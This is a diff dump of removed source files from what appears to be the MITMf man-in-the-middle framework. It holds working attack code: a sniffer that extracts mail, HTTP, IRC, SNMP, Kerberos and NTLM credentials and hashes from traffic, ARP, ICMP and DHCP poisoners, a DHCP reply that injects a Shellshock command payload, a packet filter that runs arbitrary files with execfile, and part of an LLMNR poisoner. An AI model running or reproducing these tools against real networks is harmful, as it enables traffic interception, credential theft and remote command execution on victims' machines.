elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if parsing_pcap is True:
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some add sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
try:
basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
for line in header_lines:
lineList=line.split(': ', 1)
key=lineList[0].lower()
if len(lineList)>1:
headers[key]=lineList[1]
else:
headers[key]=""
return headers
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))

View file

@ -1,42 +0,0 @@
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
from traceback import print_exc
from netfilterqueue import NetfilterQueue
formatter = logging.Formatter("%(asctime)s [PacketFilter] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("PacketFilter", formatter)
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(filter)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()

View file

@ -1,253 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from core.logger import logger
from time import sleep
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [ARPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ARPpoisoner", formatter)
class ARPpoisoner:
name = 'ARP'
optname = 'arp'
desc = 'Redirect traffic using ARP requests or replies'
version = '0.1'
def __init__(self, options):
try:
self.gatewayip = str(IPAddress(options.gateway))
except AddrFormatError as e:
sys.exit("Specified an invalid IP address as gateway")
self.gatewaymac = options.gatewaymac
if options.gatewaymac is None:
self.gatewaymac = getmacbyip(options.gateway)
if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
self.ignore = self.get_range(options.ignore)
if self.ignore is None: self.ignore = []
self.targets = self.get_range(options.targets)
self.arpmode = options.arpmode
self.debug = False
self.send = True
self.interval = 3
self.interface = options.interface
self.myip = options.ip
self.mymac = options.mac
self.arp_cache = {}
log.debug("gatewayip => {}".format(self.gatewayip))
log.debug("gatewaymac => {}".format(self.gatewaymac))
log.debug("targets => {}".format(self.targets))
log.debug("ignore => {}".format(self.ignore))
log.debug("ip => {}".format(self.myip))
log.debug("mac => {}".format(self.mymac))
log.debug("interface => {}".format(self.interface))
log.debug("arpmode => {}".format(self.arpmode))
log.debug("interval => {}".format(self.interval))
def start(self):
#create a L3 and L2 socket, to be used later to send ARP packets
#this doubles performance since send() and sendp() open and close a socket on each packet
self.s = conf.L3socket(iface=self.interface)
self.s2 = conf.L2socket(iface=self.interface)
if self.arpmode == 'rep':
t = threading.Thread(name='ARPpoisoner-rep', target=self.poison, args=('is-at',))
elif self.arpmode == 'req':
t = threading.Thread(name='ARPpoisoner-req', target=self.poison, args=('who-has',))
t.setDaemon(True)
t.start()
if self.targets is None:
log.debug('Starting ARPWatch')
t = threading.Thread(name='ARPWatch', target=self.start_arp_watch)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("Specified an invalid IP address/range/network as target")
def start_arp_watch(self):
try:
sniff(prn=self.arp_watch_callback, filter="arp", store=0)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred when invoking sniff(): {}".format(e))
pass
def arp_watch_callback(self, pkt):
if self.send is True:
if ARP in pkt and pkt[ARP].op == 1: #who-has only
#broadcast mac is 00:00:00:00:00:00
packet = None
#print str(pkt[ARP].hwsrc) #mac of sender
#print str(pkt[ARP].psrc) #ip of sender
#print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
#print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
log.debug("[ARPWatch] {} is asking where the Gateway is. Sending the \"I'm the gateway biatch!\" reply!".format(pkt[ARP].psrc))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"I'm {} biatch!\" reply!".format(pkt[ARP].pdst, pkt[ARP].pdst))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = '00:00:00:00:00:00'
packet.pdst = str(pkt[ARP].pdst)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"This is the h4xx0r box!\" reply!".format(pkt[ARP].pdst))
packet = ARP()
packet.op = 2
packet.psrc = self.myip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
try:
if packet is not None:
self.s.send(packet)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred while sending re-poison packet: {}".format(e))
def resolve_target_mac(self, targetip):
targetmac = None
try:
targetmac = self.arp_cache[targetip] # see if we already resolved that address
#log.debug('{} has already been resolved'.format(targetip))
except KeyError:
#This following replaces getmacbyip(), much faster this way
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
try:
resp, _ = sndrcv(self.s2, packet, timeout=2, verbose=False)
except Exception as e:
resp= ''
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
if len(resp) > 0:
targetmac = resp[0][1].hwsrc
self.arp_cache[targetip] = targetmac # shove that address in our cache
log.debug("Resolved {} => {}".format(targetip, targetmac))
else:
log.debug("Unable to resolve MAC address of {}".format(targetip))
return targetmac
def poison(self, arpmode):
sleep(2)
while self.send:
if self.targets is None:
self.s2.send(Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op=arpmode))
elif self.targets:
for target in self.targets:
targetip = str(target)
if (targetip != self.myip) and (target not in self.ignore):
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
sleep(self.interval)
def stop(self):
self.send = False
sleep(3)
count = 2
if self.targets is None:
log.info("Restoring subnet connection with {} packets".format(count))
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
for i in range(0, count):
self.s2.send(pkt)
elif self.targets:
for target in self.targets:
targetip = str(target)
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
#close the sockets
self.s.close()
self.s2.close()

View file

@ -1,147 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
from netaddr import IPAddress, IPNetwork
from core.logger import logger
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [DHCPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DHCPpoisoner", formatter)
class DHCPpoisoner():
def __init__(self, options):
self.interface = options.interface
self.ip_address = options.ip
self.mac_address = options.mac
self.shellshock = options.shellshock
self.netmask = options.netmask
self.debug = False
self.dhcp_dic = {}
log.debug("interface => {}".format(self.interface))
log.debug("ip => {}".format(self.ip_address))
log.debug("mac => {}".format(self.mac_address))
log.debug("netmask => {}".format(self.netmask))
log.debug("shellshock => {}".format(self.shellshock))
def start(self):
self.s2 = conf.L2socket(iface=self.interface)
t = threading.Thread(name="DHCPpoisoner", target=self.dhcp_sniff)
t.setDaemon(True)
t.start()
def stop(self):
self.s2.close()
def dhcp_sniff(self):
try:
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning: {}".format(e))
def get_client_ip(self, xid, dhcp_options):
try:
field_name, req_addr = dhcp_options[2]
if field_name == 'requested_addr':
return 'requested', req_addr
raise ValueError
except ValueError:
for field in dhcp_options:
if (field is tuple) and (field[0] == 'requested_addr'):
return field[1]
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
log.debug('Saw a DHCP packet')
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP DISCOVER from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP DISCOVER from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address)),
"end"]))
log.info("Sending DHCP OFFER")
self.s2.send(packet)
if resp[DHCP].options[0][1] == 3:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP REQUEST from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP REQUEST from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address))]))
if self.shellshock:
log.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
log.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
self.s2.send(packet)

View file

@ -1,60 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from time import sleep
from core.logger import logger
from scapy.all import IP, ICMP, UDP, sendp
formatter = logging.Formatter("%(asctime)s [ICMPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ICMPpoisoner", formatter)
class ICMPpoisoner():
def __init__(self, options):
self.target = options.target
self.gateway = options.gateway
self.interface = options.interface
self.ip_address = options.ip
self.debug = False
self.send = True
self.icmp_interval = 2
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)

View file

@ -1,119 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
import threading
from traceback import print_exc
from core.responder.packets import LLMNR_Ans
from core.responder.odict import OrderedDict
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPLLMNRServer(('', 5355), LLMNRServer)
t = threading.Thread(name='LLMNR', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LLMNR server on port 5355: {}".format(e)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_LLMNR_Name(data):
NameLen = struct.unpack('>B',data[12])[0]
Name = data[13:13+NameLen]
return Name
def IsOnTheSameSubnet(ip, net):
net = net+'/24'
